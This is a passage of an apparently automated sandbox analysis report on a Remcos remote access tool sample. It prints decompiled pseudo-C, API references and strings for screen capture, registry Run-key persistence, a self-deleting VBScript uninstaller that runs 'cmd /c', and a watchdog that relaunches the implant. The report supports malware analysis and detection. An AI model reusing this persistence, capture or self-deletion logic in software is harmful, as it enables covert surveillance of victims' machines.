						} else {
							_t127 = (_t110 << 0x00000020 | _t124) >> 1;
							_t112 = _t110 >> 1;
							if((_t87 & 0x00000001) == 0) {
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x30], xmm0");
								_v28 = _v48;
								_t97 = _v52;
							} else {
								_t97 = 0;
								_v28 = 0x80000000;
							}
							_t110 = _t112 | _v28;
							_t124 = _t127 | _t97;
							_t83 = (_t101 << 0x00000020 | _v8) >> 0x1 ^ 0x00000000;
							_t101 = _t101 >> 0x00000001 ^ 0xe1000000;
						}
						_t106 = (_t106 << 0x00000020 | _t118) << 1;
						_v8 = _t83;
						_t118 = _t118 + _t118;
						_t68 =  &_v32;
						 *_t68 = _v32 - 1;
					} while ( *_t68 != 0);
					_t105 = _v36 + 1;
					_v36 = _t105;
				} while (_t105 < 2);
				_t108 = _v44;
				_t93 = _v12;
				_t108[1] = _v16;
				_t108[2] = _v20;
				_t108[3] = _v24;
				 *_t108 = _t93;
				return _t93;
			}

0x004228b5
0x004228b9
0x004228bd
0x004228c1
0x004228c9
0x004228cf
0x004228d4
0x004228da
0x004228dd
0x004228e0
0x004228e3
0x004228e5
0x004228eb
0x004228ee
0x004228f1
0x004228f4
0x004228f4
0x004228f7
0x004228fe
0x00422905
0x00422908
0x0042290b
0x0042290e
0x0042290e
0x00422910
0x00422918
0x0042291b
0x0042291e
0x00422921
0x00422921
0x0042292c
0x0042292f
0x00422974
0x0042297b
0x00422980
0x0042298d
0x00422990
0x00422998
0x0042299b
0x00422982
0x00422982
0x00422984
0x00422984
0x0042299e
0x004229a1
0x004229a6
0x004229aa
0x00422931
0x00422931
0x00422938
0x0042293d
0x0042294a
0x0042294d
0x00422955
0x00422958
0x0042293f
0x0042293f
0x00422941
0x00422941
0x0042295b
0x0042295e
0x00422969
0x0042296c
0x0042296c
0x004229ac
0x004229b0
0x004229b3
0x004229b5
0x004229b5
0x004229b5
0x004229c2
0x004229c3
0x004229c6
0x004229cf
0x004229d5
0x004229d8
0x004229de
0x004229e4
0x004229e9
0x004229ef

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
Instruction ID: 8a3ae867f516ed0e2e9c01a73be58a3114cf568e77fba31660d2fa1df03bda71
Opcode Fuzzy Hash: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
Instruction Fuzzy Hash: 7E410972E102199BCB04CFA9D58179DFBF1FF88310F25815AE904B3300D3B5AA82CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004142A5, Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 298
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004142A5(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = E004146DC( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t114 = E00414728( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							E00414769( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E004020B5(_t194,  &_v80);
												E004020B5(_t194,  &_v168);
												E004024FD(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												E00403416( &_v80);
												E004024FD(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												E00403416( &_v80);
												_t235 = _a4;
												E004024FD(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												E00403416( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												E00402024(_t194, _t194, __eflags,  &_v168);
												L00401FA7();
												L00401FA7();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					E00402064(_t194, _t194, 0x45f6ac);
					L32:
					return _t194;
				}
			}

0x004142b3
0x004142be
0x004142c6
0x004142c9
0x004142d5
0x004142d7
0x004142e6
0x004142f3
0x004142f8
0x004142fb
0x00414300
0x0041431a
0x00414320
0x00414323
0x00414325
0x0041433f
0x00414345
0x00414347
0x00414360
0x00414364
0x0041436f
0x0041438f
0x00414395
0x00414397
0x00000000
0x00000000
0x00414399
0x0041439d
0x004143a2
0x004143aa
0x004143b0
0x004143b2
0x004143be
0x004143c4
0x004143c6
0x004143e0
0x004143e0
0x004143e3
0x004143ec
0x004143f7
0x004143fb
0x00414401
0x00414401
0x004143c6
0x004143b2
0x00414407
0x0041440a
0x0041440f
0x00414415
0x00414417
0x00000000
0x0041441d
0x00414424
0x0041442a
0x0041442d
0x00414433
0x00414435
0x00414436
0x00414439
0x0041443c
0x00414469
0x00414469
0x00414472
0x00414473
0x0041447b
0x0041447f
0x00414480
0x00414489
0x0041448f
0x00414496
0x0041449e
0x004144a2
0x004144a5
0x004144a8
0x004144af
0x004144b1
0x004144b1
0x004144bd
0x004144c1
0x004144c5
0x004144c6
0x004144d4
0x004144db
0x004144de
0x004144e4
0x004144e7
0x004144e9
0x00414502
0x00414508
0x0041450a
0x00414537
0x0041454b
0x00414550
0x0041455b
0x0041455b
0x00414561
0x00414564
0x0041456f
0x0041457d
0x0041458c
0x00414597
0x004145a6
0x004145ae
0x004145b5
0x004145c4
0x004145cc
0x004145d3
0x004145e2
0x004145e5
0x004145f0
0x004145fb
0x00414603
0x00000000
0x00414603
0x00414515
0x00414518
0x0041451d
0x00414527
0x00000000
0x004144eb
0x004144eb
0x0041434a
0x00414350
0x00414353
0x00414355
0x00000000
0x00414355
0x004144e9
0x0041443e
0x00414440
0x00414441
0x00414444
0x00414447
0x00000000
0x00000000
0x00414449
0x0041444b
0x0041444c
0x0041444f
0x00414452
0x00000000
0x00000000
0x00414456
0x00414457
0x0041445a
0x00414463
0x00414465
0x00414466
0x00414466
0x00000000
0x00414466
0x0041445c
0x0041445f
0x00000000
0x0041445f
0x00000000
0x0041442f
0x00414417
0x00414349
0x00414349
0x00000000
0x00414327
0x0041432e
0x00414331
0x00414333
0x00414335
0x00414335
0x00000000
0x00414335
0x00414306
0x00414306
0x0041430d
0x0041460a
0x00414610
0x00414610

APIs

CreateDCA.GDI32 ref: 004142C0
CreateCompatibleDC.GDI32(00000000), ref: 004142CC

Part of subcall function 004146DC: GetMonitorInfoW.USER32(?,?), ref: 004146FC

Part of subcall function 00414728: GetMonitorInfoW.USER32(?,?), ref: 00414748

CreateCompatibleBitmap.GDI32 ref: 0041431A
DeleteDC.GDI32 ref: 0041432E
DeleteDC.GDI32 ref: 00414331
DeleteObject.GDI32 ref: 00414335
SelectObject.GDI32(00000000,00000000,?,?), ref: 0041433F
DeleteDC.GDI32 ref: 00414350
DeleteDC.GDI32 ref: 00414353
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041438F
GetCursorInfo.USER32(?,?,?), ref: 004143AA
GetIconInfo.USER32(?,?), ref: 004143BE
DeleteObject.GDI32 ref: 004143E3
DeleteObject.GDI32 ref: 004143EC
DrawIcon.USER32 ref: 004143FB
GetObjectA.GDI32(?,00000018,?), ref: 0041440F
LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414475
GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 004144DE
GetDIBits.GDI32 ref: 00414502
DeleteDC.GDI32 ref: 00414515
DeleteDC.GDI32 ref: 00414518
DeleteObject.GDI32 ref: 0041451D
GlobalFree.KERNEL32 ref: 00414527
DeleteObject.GDI32 ref: 004145CC
GlobalFree.KERNEL32 ref: 004145D3
DeleteDC.GDI32 ref: 004145E2
DeleteDC.GDI32 ref: 004145E5

Strings

d?A, xrefs: 00414381, 004143E0
DISPLAY, xrefs: 004142B9

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
String ID: DISPLAY$d?A
API String ID: 517350757-979833423
Opcode ID: 71cbdedbac5e60107d64ac5963401931814e8bfcb5ed84c05bdede98dcae59da
Instruction ID: 5f48c5219878f18165c8a10fe86ed1b3fa979366dd0a80e665ef025d0f654af7
Opcode Fuzzy Hash: 71cbdedbac5e60107d64ac5963401931814e8bfcb5ed84c05bdede98dcae59da
Instruction Fuzzy Hash: 1AB18075A00319AFDB10DFA0DC45BEEBBB8EF44752F00402AF945E7291DB74AA85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B465, Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 280
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040B465(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				short* _t135;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;

				L0040FB4B();
				if( *0x46a9d4 != 0x30) {
					L00409D75();
				}
				_t243 =  *0x46bd6b - 1; // 0x0
				if(_t243 == 0) {
					L00414D1D(_t243);
				}
				if( *0x46ba75 != 0) {
					E004170AC(L00401ECB(0x46c0e0));
				}
				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t245 =  *0x46bb06 - 1; // 0x1
				if(_t245 == 0) {
					E0041074C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401ECB(0x46c4e8));
				}
				_t246 =  *0x46baff - 1; // 0x0
				if(_t246 == 0) {
					E0041074C(0x80000002, _t231, L00401ECB(0x46c4e8));
				}
				_t247 =  *0x46bb04 - 1; // 0x0
				if(_t247 == 0) {
					E0041074C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401ECB(0x46c4e8));
				}
				_t53 = E00402469();
				_t54 = L00401F75(0x46c560);
				_t57 = E00410420(L00401F75(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F75(0x46c518));
				_t61 = SetFileAttributesW( &_v692, 0x80);
				_t140 = 0x46c530;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E004074E6(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x46c530;
					SetFileAttributesW(L00401ECB(0x46c530), 0x80);
				}
				E00403086(_t134,  &_v124, E0040425F(_t134,  &_v52, E0043918F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
				L00401ED0();
				E004043E5(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040425F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401ED0();
				_t250 = _t134;
				if(_t134 != 0) {
					E004032F1(E00403086(_t134,  &_v52, E004043E5(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040425F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
					L00401ED0();
					L00401ED0();
					L00401ED0();
				}
				E004032F1(E00403086(_t134,  &_v100, E00403086(_t134,  &_v76, E0040425F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				_t251 = _t134;
				if(_t134 != 0) {
					E0040766E(_t134,  &_v28, 0, L"wend\n");
				}
				_t135 =  &E0045F714;
				_t78 = E004074E6(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E004032F1(E00403086(_t135,  &_v100, L00409E6B( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
					L00401ED0();
					L00401ED0();
				}
				_t79 = E0040425F(_t135,  &_v172, L"\"\"\", 0");
				E004032F1(E00403086(_t135,  &_v100, E00403010( &_v76, E00404409(_t135,  &_v52, E0040425F(_t135,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				E0040766E(_t135,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = L00401ECB( &_v124);
				_t93 = E00402469();
				if(E0041729F(L00401ECB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", L00401ECB( &_v124), _t135, _t135, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401ED0();
				L00401ED0();
				return L00401ED0();
			}

0x0040b471
0x0040b47d
0x0040b47f
0x0040b47f
0x0040b487
0x0040b48d
0x0040b48f
0x0040b48f
0x0040b49b
0x0040b4a9
0x0040b4a9
0x0040b4b3
0x0040b4b8
0x0040b4be
0x0040b4cf
0x0040b4d4
0x0040b4d5
0x0040b4db
0x0040b4ec
0x0040b4f1
0x0040b4f2
0x0040b4f8
0x0040b50c
0x0040b511
0x0040b519
0x0040b521
0x0040b547
0x0040b551
0x0040b553
0x0040b55e
0x0040b55e
0x0040b571
0x0040b589
0x0040b594
0x0040b599
0x0040b59b
0x0040b59e
0x0040b5a3
0x0040b5a5
0x0040b5ac
0x0040b5b7
0x0040b5b7
0x0040b5d7
0x0040b5e0
0x0040b5fb
0x0040b604
0x0040b609
0x0040b60b
0x0040b63f
0x0040b647
0x0040b64f
0x0040b657
0x0040b657
0x0040b68f
0x0040b697
0x0040b69f
0x0040b6a7
0x0040b6ac
0x0040b6ae
0x0040b6b8
0x0040b6b8
0x0040b6bd
0x0040b6cb
0x0040b6d0
0x0040b6d2
0x0040b6f7
0x0040b6ff
0x0040b707
0x0040b707
0x0040b71c
0x0040b75b
0x0040b763
0x0040b76b
0x0040b773
0x0040b77e
0x0040b789
0x0040b796
0x0040b79f
0x0040b7a8
0x0040b7c6
0x0040b7e6
0x0040b7e6
0x0040b7ef
0x0040b7f7
0x0040b80a

APIs

Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,0046C500,0040D57C), ref: 0040FB5B
Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF), ref: 0040FB6E

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B55E
RegDeleteKeyA.ADVAPI32 ref: 0040B571
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B589
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B5B7

Part of subcall function 00409D75: TerminateThread.KERNEL32(0040884D,00000000,0046C500,0040B126,?,0046C518,0046C500), ref: 00409D84
Part of subcall function 00409D75: UnhookWindowsHookEx.USER32 ref: 00409D94
Part of subcall function 00409D75: TerminateThread.KERNEL32(00408832,00000000,?,0046C518,0046C500), ref: 00409DA6

Part of subcall function 0041729F: CreateFileW.KERNEL32(00412B11,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000000,00000000,?,004173C9,00000000,00000000), ref: 004172DE

ShellExecuteW.SHELL32(00000000,open,00000000,Function_0005F714,Function_0005F714,00000000), ref: 0040B7DA
ExitProcess.KERNEL32 ref: 0040B7E6

Strings

"), xrefs: 0040B60D
fso.DeleteFolder ", xrefs: 0040B6DA
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B726
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040B502
""", 0, xrefs: 0040B711
fso.DeleteFile ", xrefs: 0040B668
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B78E
while fso.FileExists(", xrefs: 0040B622
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040B5E5
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040B4B3
\update.vbs, xrefs: 0040B5B9
On Error Resume Next, xrefs: 0040B5F3
Remcos, xrefs: 0040B4AE
exepath, xrefs: 0040B539
open, xrefs: 0040B7D4
wend, xrefs: 0040B6B0
Temp, xrefs: 0040B5BE

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-219127200
Opcode ID: 84dbea677adb8137c69cd8cbe3d12af9b80bd789ef93ffd24b9dd350145a43a8
Instruction ID: cb4c9db422e66655c9b91f3ac858345e6386e01706fd0e6f849a483e47031bcc
Opcode Fuzzy Hash: 84dbea677adb8137c69cd8cbe3d12af9b80bd789ef93ffd24b9dd350145a43a8
Instruction Fuzzy Hash: 9891B131A101186ACB14FB62DCA69EF7769AF50348F14007FF406731E2EF781E4A869E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F785, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 181
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040F785() {
				long _v8;
				char _v32;
				short _v556;
				short _v1076;
				short _v1596;
				short _v2116;
				void* _t27;
				void* _t28;
				void* _t31;
				long _t37;
				int _t41;
				long _t50;
				void* _t55;
				void* _t68;
				void* _t70;
				int _t71;
				void* _t72;
				long _t73;
				void* _t110;
				void* _t112;
				void* _t115;
				void* _t116;

				_t71 = 0;
				_v8 = _t73;
				CreateMutexA(0, 1, "Mutex_RemWatchdog");
				GetModuleFileNameW(0,  &_v2116, 0x104);
				_t27 = E00402469();
				_t28 = L00401F75(0x46c560);
				_t108 = 0x46c518;
				_t31 = E00410420(L00401F75(0x46c518), "exepath",  &_v556, 0x208, _t28, _t27);
				_t116 = _t115 + 0x14;
				if(_t31 != 0) {
					E004020B5(0,  &_v32);
					if(E00417334( &_v556,  &_v32) == 0) {
						goto L1;
					}
					_t110 = OpenProcess(0x100000, 0, _v8);
					WaitForSingleObject(_t110, 0xffffffff);
					CloseHandle(_t110);
					_t37 = GetCurrentProcessId();
					if(E004105A0(0x46c518, L00401F75(0x46c518), "WDH", _t37) == 0) {
						L18:
						_push(1);
						L2:
						ExitProcess();
					}
					_t108 = ShellExecuteW;
					do {
						_t41 = PathFileExistsW( &_v556);
						_t42 =  &_v556;
						if(_t41 != 0) {
							L11:
							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
							L12:
							do {
								_t72 = E00410275(L00401F75(0x46c518), "WD",  &_v8);
								_t122 = _t72;
								if(_t72 == 0) {
									Sleep(0x1f4);
								} else {
									E004106D2(L00401F75(0x46c518), _t122, "WD");
								}
							} while (_t72 == 0);
							goto L17;
						}
						_t55 = E00402469();
						if(E0041729F(L00401F75( &_v32), _t55,  &_v556, _t71) == 0) {
							E00431810(_t108,  &_v1596, _t71, 0x208);
							_t116 = _t116 + 0xc;
							GetTempPathW(0x104,  &_v1596);
							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
							lstrcatW( &_v1076, L".exe");
							_t68 = E00402469();
							_t70 = E0041729F(L00401F75( &_v32), _t68,  &_v1076, _t71);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L12;
							}
							_t42 =  &_v1076;
							goto L11;
						}
						_t42 =  &_v556;
						goto L11;
						L17:
						_t71 = 0;
						_t112 = OpenProcess(0x100000, 0, _v8);
						WaitForSingleObject(_t112, 0xffffffff);
						CloseHandle(_t112);
						_t50 = GetCurrentProcessId();
					} while (E004105A0(0x46c518, L00401F75(0x46c518), "WDH", _t50) != 0);
					goto L18;
				}
				L1:
				_push(_t71);
				goto L2;
			}

0x0040f798
0x0040f79a
0x0040f79e
0x0040f7b1
0x0040f7be
0x0040f7c6
0x0040f7d7
0x0040f7eb
0x0040f7f0
0x0040f7f5
0x0040f801
0x0040f816
0x00000000
0x00000000
0x0040f827
0x0040f82c
0x0040f833
0x0040f839
0x0040f857
0x0040f9ce
0x0040f9ce
0x0040f7f8
0x0040f7f8
0x0040f7f8
0x0040f85d
0x0040f863
0x0040f86a
0x0040f872
0x0040f878
0x0040f92e
0x0040f939
0x0040f93b
0x0040f940
0x0040f957
0x0040f95b
0x0040f95d
0x0040f97a
0x0040f95f
0x0040f96d
0x0040f972
0x0040f980
0x00000000
0x0040f940
0x0040f883
0x0040f89f
0x0040f8b9
0x0040f8be
0x0040f8cd
0x0040f8e7
0x0040f8f9
0x0040f90a
0x0040f91d
0x0040f924
0x0040f926
0x00000000
0x00000000
0x0040f928
0x00000000
0x0040f928
0x0040f8a1
0x00000000
0x0040f984
0x0040f987
0x0040f995
0x0040f99a
0x0040f9a1
0x0040f9a7
0x0040f9c6
0x00000000
0x0040f863
0x0040f7f7
0x0040f7f7
0x00000000

APIs

CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,0046C578,0046C518,00000000), ref: 0040F79E
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F7B1

Part of subcall function 00410420: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 0041043C
Part of subcall function 00410420: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410455
Part of subcall function 00410420: RegCloseKey.KERNEL32(00000000), ref: 00410460

ExitProcess.KERNEL32 ref: 0040F7F8
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040F821
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040F82C
CloseHandle.KERNEL32(00000000), ref: 0040F833
GetCurrentProcessId.KERNEL32 ref: 0040F839
PathFileExistsW.SHLWAPI(?), ref: 0040F86A
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040F939
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040F98F
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040F99A
CloseHandle.KERNEL32(00000000), ref: 0040F9A1
GetCurrentProcessId.KERNEL32 ref: 0040F9A7

Strings

Mutex_RemWatchdog, xrefs: 0040F791
temp_, xrefs: 0040F8DB
exepath, xrefs: 0040F7DD
open, xrefs: 0040F933
.exe, xrefs: 0040F8ED
WDH, xrefs: 0040F840, 0040F9AE

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
API String ID: 2645874385-232273909
Opcode ID: 209e74090223b3577e71da1ef0680a3f965f383780c67700559ac9c4fd2dee71
Instruction ID: 39908bf11b75da137bed33461dc6f1560e7a678cbeca7b59d94bc4d120dac13a
Opcode Fuzzy Hash: 209e74090223b3577e71da1ef0680a3f965f383780c67700559ac9c4fd2dee71
Instruction Fuzzy Hash: FF51F571A003197BDB10ABA09C49EFF336C9B04755F10007BB501A32E2EF788E498B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041636B, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 185
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041636B(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
